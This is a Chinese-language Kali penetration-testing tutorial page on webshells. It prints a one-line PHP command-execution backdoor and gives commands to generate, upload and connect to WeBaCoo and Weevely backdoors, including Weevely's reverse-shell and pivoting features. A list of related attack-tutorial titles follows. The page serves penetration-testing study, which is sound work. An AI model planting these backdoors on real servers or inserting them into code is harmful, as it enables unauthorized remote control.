Kali渗透测试_WebShell
- 之前我们介绍过一句话的webshell
<?php echo shell_exec($_GET['cmd']);?>
中国菜刀
可能被IDS、AV、WAF、扫描器软件发现查杀
中国菜刀
- 下载好了之后,复制这个代码去服务器
- 之后运行客户端程序并添加服务器地址
- 然后双击就可以正常连接了
WeBaCoo(Web Backdoor Cookie)
类终端的shell
编码通信内容通过cookie头传输,隐蔽性较强
cm:base64编码的命令
cn:服务器用于返回数据
cp:返回信息定界符
生成服务端
webacoo -g -o a.php
客户端去连接,可以正常连接;
webacoo -t -u http://IP/a.php
- 当然他还有其他很多的命令,自己去试试把
Weevely
隐蔽的类终端PHP Webshell
30多个管理模块
执行系统命令、浏览文件系统
检查服务器常见配置错误
创建正向、反向TCP SHELL连接
通过目标计算机代理HTTP流量
从目标计算机进行端口扫描,渗透内网
支持连接密码
首先需要安装一下库文件
- 首先访问这个网站https://pypi.python.org/pypi/PySocks/
- 之后解压出来,然后./setup.py install
- 生成服务端并传入至服务器中
weevely generate 123456 wee.php (132456为连接密码)
- 之后可以连接了
weevely http://192.168.0.119/wee.php 123456 (123456就是设置的密码)
- 当然还有很多的可利用模块,大家可以试试
Kali渗透测试_WebShell相关推荐
- Kali渗透测试-远程控制:6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...
- Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例("永恒之蓝")经典的漏洞,单击这个模块以后就可以开始攻击了. 实 验 环 境 ...
- Kali渗透测试:使用browser_autopwn2模块进行渗透攻击
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块.这种攻击的思路是渗透者构造一个攻击用的Web服 ...
- kali渗透测试系列---信息收集
kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...
- Kali渗透测试:网络数据的嗅探与欺骗
Kali渗透测试:网络数据的嗅探与欺骗 无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理. 另外,很多网络攻击的方法也都是发送 ...
- 学习Kali渗透测试笔记
Kali渗透测试 一.什么是渗透测试 1. 软件测试 2. 安全测试与渗透测试 3.渗透测试 二.渗透测试的目标 1. 网络硬件设备 2. 主机操作系统 3. 应用系统 4. 数据库系统 三.渗透测试 ...
- Kali渗透测试:身份认证攻击
Kali渗透测试:身份认证攻击 1.1 简单网络服务认证的攻击 网络上很多常见的应用都采用了密码认证的方式,如SSH.Telnet.FTP等.这些应用被广泛应用在各种网络设备上,如果这些认证模式出现问 ...
- kali渗透测试实战操作
Kali渗透测试复现 所需环境 所需环境 Vmware Kali Linux(IP:192.168.145.128) Windows 7 or Windows 10 打开终端,输入msfconsole ...
- kali渗透测试环境搭建
推荐阅读 kali渗透测试环境搭建 https://m.weishi100.com/mweb/series/?id=1373351 https://m.weishi100.com/mweb/seri ...
最新文章
- BZOJ4668: 冷战 [并查集 按秩合并]
- Expression Blend 5 Preview For Silverlight5 RC已发布
- 设计模式:中介者模式(Mediator)
- LightGBM——提升机器算法(图解+理论+安装方法+python代码)
- tomcat使用遇到的问题汇总
- 用Veritas制作MSI文件,Active Directory系列之二十四
- html文件转成base64字符串,js 转base64字符串为文件
- 函数编程(Functional programming)
- FPGA 实现 RGB 图像转 Gray
- atitit.客户端连接oracle数据库的方式总结
- ai驱动数据安全治理_利用AI驱动的自动协调器实时停止有毒信息
- 国家集训队论文分类整理[转]
- 计算机组成原理资料(选择题)
- App架构师实践指南四之性能优化一
- 家用 NAS 服务器搭建 | 网络 | DNS域名解析
- 动态磁盘和基本磁盘的区别
- Redis分布式锁背后的原理
- 写了2年文章的我,昨天第一次露脸直播。
- 五十岁后肌肉衰减,力量下降?男性想要恢复力量应该怎么做?
- 语音用户累计破1.4亿!百度AI地图成智能交通基础设施
热门文章
- 网络编程(网络基础、套接字Socket、数据报Datagram及其常用方法)
- Navicat for MySQL 数据库应用 (三)
- 两招小办法对付宝宝发烧、咳嗽。超级管用哈
- Kotlin 关于 REPL交互式编程命令行 运行kts报错问题
- 重定向dup和dup2
- 企业再造(Re-engineering)(转载)
- [文献阅读] Sparsity in Deep Learning: Pruning and growth for efficient inference and training in NN
- h3c s5130交换机配置vlan和telnet服务
- 虚幻引擎获取bilibili直播间弹幕插件的使用教程
- Pytorch纯新手入门笔记